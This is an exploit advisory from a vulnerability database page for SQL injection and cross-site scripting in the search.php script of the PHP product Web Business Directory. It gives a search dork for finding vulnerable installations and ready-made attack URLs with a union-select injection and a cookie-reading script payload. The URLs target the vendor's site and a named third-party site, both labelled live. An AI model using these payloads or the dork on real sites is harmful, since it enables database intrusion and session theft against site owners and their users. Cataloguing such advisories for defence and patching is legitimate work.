Web Business Directory 1.1 (search.php) Multiple Remote Vulnerabilities

2010.03.12
Credit: Moudi
Risk: High
Local: No
Remote: Yes
CWE: CWE-89
CWE-79

[&#187;] Web Business Directory 1.0 (search.php) Multiple Remote Vulnerabilities ========== [&#187;] Script: [ Web Business Directory 1.0 ] [&#187;] Language: [ PHP ] [&#187;] Download: [ http://www.phpdirectorysource.com/ ] [&#187;] Founder: [ Moudi <m0udi@9.cn> ] [&#187;] Thanks to: [ MiZoZ , ZuKa , str0ke , 599em Man , Security-Shell ...] [&#187;] Team: [ EvilWay ] [&#187;] Dork: [ Copyright 2005-2006 phpDirectorySource&#65533;, all rights reserved ] [&#187;] Price: [ $75.00 ] [&#187;] Site : [ https://security-shell.ws/forum.php ] ########################################################################### ===[ Exploit SQL INJECTION + LIVE : vulnerability ]=== [&#187;] http://www.site.com/patch/search.php?sa=site&sk=a&nl=11&st= [&#187;] http://www.phpdirectorysource.com/directory/search.php?sa=site&sk=a&nl=11&st=XX' union select version()/* [&#187;] http://ilovealbertaoil.com/search.php?sa=site&sk=a&nl=11&st=XX' union select version()/* ===[ Exploit XSS + LIVE : vulnerability ]=== [&#187;] http://www.site.com/patch/search.php?sa=site&sk=a&nl=11&st= [&#187;] http://www.phpdirectorysource.com/directory/search.php?sa=site&sk=a&nl=11&st="><script>alert(document.cookie);</script> [&#187;] http://ilovealbertaoil.com/search.php?sa=site&sk=a&nl=11&st="><script>alert(document.cookie);</script> Author: Moudi ##############

References:

http://www.securityfocus.com/bid/35760
http://www.milw0rm.com/exploits/9226
http://secunia.com/advisories/35941
http://packetstormsecurity.org/0907-exploits/wbd-sqlxss.txt


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top